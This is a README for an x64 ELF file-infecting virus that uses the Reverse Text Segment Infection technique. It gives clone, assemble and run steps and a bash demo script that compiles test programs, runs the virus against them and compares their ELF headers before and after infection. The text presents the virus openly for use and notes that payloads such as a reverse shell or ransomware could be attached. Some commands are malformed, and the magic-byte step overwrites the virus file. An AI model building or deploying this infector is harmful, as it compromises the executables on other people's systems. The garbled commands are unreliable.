This virus should be assembled with FASM x64 (tested with version 1.73.27 on Linux 5.11.14-gentoo). It relies on the Reverse Text Segment Infection technique where the segment is extended in reverse by PAGE_SIZE to make room for the virus. This technique only works on regular ELF executables (does not work with PIE). It is also not working on systems with huge pages enabled at this time. PAGE_SIZE alignment should be calculated dynamically, but this code assumes its value of 4096 for demonstration purposes. It infects the current directory (non-recursively). The entry point still resides in the .text segment, which is less suspicious.
- First clone the repository
git clone github.com/president-xd/pinky-virus
- Change the directory to Repository
cd pinky-virus- Place your ELF in the directory where ELF is located.
cp /path/of/elf /path/to/pinky-virus
- Compile the ASM file
fasm pinky-virus
- Add random bytes to positon after the magic bytes
echo -n 544d5a00 | xxd -r -p -s pinky-virus
- Execute the pinky-virus
sudo chmod +x pinky-virus ./pinky-virus
- Run your ELFs
./your-elfs-name
Here is the demo, that we used in the our system. We used automated injection using bash script to automate all commands. In this demo, we used sample files named file.c and file2.c. Here are codes and results:
- Code of File.c
#include <stdio.h> int main(){ printf("This is file.c file."); return 0; }
- Code of File2.c named hi.c
#include <stdio.h> int main(){ printf("Hello World!"); return 0; }
Note: The pinky-virus file is available in the my github repo.
#!/bin/bash
# Define the file names to check and delete
files=("virus" "hi" "file")
# Delete specified files
echo "========================= CLEANING UP OLD FILES ========================="
for file in "${files[@]}"; do
if [ -f "$file" ]; then
echo "Deleting $file..."
rm "$file"
else
echo "$file not found, skipping..."
fi
done
echo "======================================================================="
echo " "
# Compile the commands
echo "============================= COMPILATION ============================="
echo "1. Compiling file.c..."
gcc file.c -o file -no-pie && echo "file.c compiled successfully!" || echo "Failed to compile file.c."
echo "------------------------------------------------------------------------"
echo "2. Compiling hi.c..."
gcc hi.c -o hi -no-pie && echo "hi.c compiled successfully!" || echo "Failed to compile hi.c."
echo "------------------------------------------------------------------------"
echo "3. Assembling virus.asm..."
fasm virus.asm && echo "==> Virus.asm assembled successfully!" || echo "Failed to assemble virus.asm."
echo "======================================================================="
echo " "
# Analyze ELF headers before injection
echo "========================= ELF HEADER ANALYSIS ========================="
if [ -f "hi" ]; then
echo "----------------------------- hi.c ELF Header --------------------------"
readelf -h hi
else
echo "Error: hi executable not found!"
fi
echo "----------------------------------------------------------------------"
echo " "
if [ -f "file" ]; then
echo "--------------------------- file.c ELF Header --------------------------"
readelf -h file
else
echo "Error: file executable not found!"
fi
echo "----------------------------------------------------------------------"
echo " "
# Execute ELF files before injection
echo "====================== EXECUTION BEFORE INJECTION ======================"
if [ -x "./hi" ]; then
echo "----------------------------- Executing hi.c --------------------------"
./hi
else
echo "Error: Unable to execute hi executable!"
fi
echo ""
echo "----------------------------------------------------------------------"
echo " "
if [ -x "./file" ]; then
echo "--------------------------- Executing file.c --------------------------"
./file
else
echo "Error: Unable to execute file executable!"
fi
echo ""
echo "----------------------------------------------------------------------"
echo " "
# Execute virus file
echo "========================= VIRUS EXECUTION ============================="
if [ -f "virus" ]; then
echo "Executing virus..."
chmod +x virus
echo "------------------------------------------------------------------------"
./virus && echo "==> Virus executed successfully!" || echo "Error executing virus file!"
echo "------------------------------------------------------------------------"
else
echo "Error: virus file not found!"
fi
echo "======================================================================="
echo " "
# Inject magic byte (for educational purposes only)
echo "========================= MAGIC BYTE INJECTION ========================="
if [ -f "virus" ]; then
echo -n "544d5a00" | xxd -r -p > virus
echo "Magic byte injection completed."
else
echo "Error: virus file not found for injection!"
fi
echo "======================================================================="
echo " "
# Analyze ELF headers after injection
echo "====================== ELF HEADER AFTER INJECTION ======================"
if [ -f "file" ]; then
echo "--------------------------- file.c ELF Header --------------------------"
readelf -h file
else
echo "Error: file executable not found!"
fi
echo "----------------------------------------------------------------------"
echo " "
if [ -f "hi" ]; then
echo "----------------------------- hi.c ELF Header --------------------------"
readelf -h hi
else
echo "Error: hi executable not found!"
fi
echo "----------------------------------------------------------------------"
echo " "
# Execute ELF files after injection
echo "====================== EXECUTION AFTER INJECTION ======================="
if [ -x "./hi" ]; then
echo "----------------------------- Executing hi.c --------------------------"
./hi
else
echo "Error: Unable to execute hi executable!"
fi
echo "----------------------------------------------------------------------"
echo " "
if [ -x "./file" ]; then
echo "--------------------------- Executing file.c --------------------------"
./file
else
echo "Error: Unable to execute file executable!"
fi
echo ""
echo "----------------------------------------------------------------------"
echo " "
# End of script
echo "=============================== FINISHED =============================="-
Reverse Text Segment Infection:
- The virus extends the text segment of the ELF file in reverse by a page size (typically 4096 bytes) to make room for its code.
-
Limitations:
- This technique works only on regular ELF executables and does not work with Position-Independent Executables (PIE).
- The virus does not operate on systems with huge pages enabled (pages larger than 4096 bytes).
-
PAGE_SIZE Alignment:
- The alignment should be dynamically calculated, but for demonstration purposes, this code assumes a page size of 4096 bytes.
-
Infection Process:
- It infects files in the current directory only (non-recursive).
- It has no destructive payload, meaning it does not damage the files it infects.
-
Entry Point:
- The virus's entry point remains in the text segment of the infected file, making it less suspicious and harder to detect.
- x64 ELF infector
- Reverse Text Segment Infection
- Infects files in the current directory (non-recursive)
- Non-destructive (It can be destructive if any individual binds malware such as reverse shell, or ransomware etc.)
- Does not work with PIE executables
- Incompatible with systems using huge pages
- Assumes PAGE_SIZE is 4096 bytes
- Remains within the text segment, making it less suspicious
- This explanation assumes a PAGE_SIZE of 4096 for simplicity and demonstration purposes.
- Use it for educational purposes only.
- A big thanks for those who keeps the VX scene alive!
- @guitmz || @TMZvx
- Abdul Wahab Khan
- Asad Muhammad Channer
- Qazi Muhammad Awais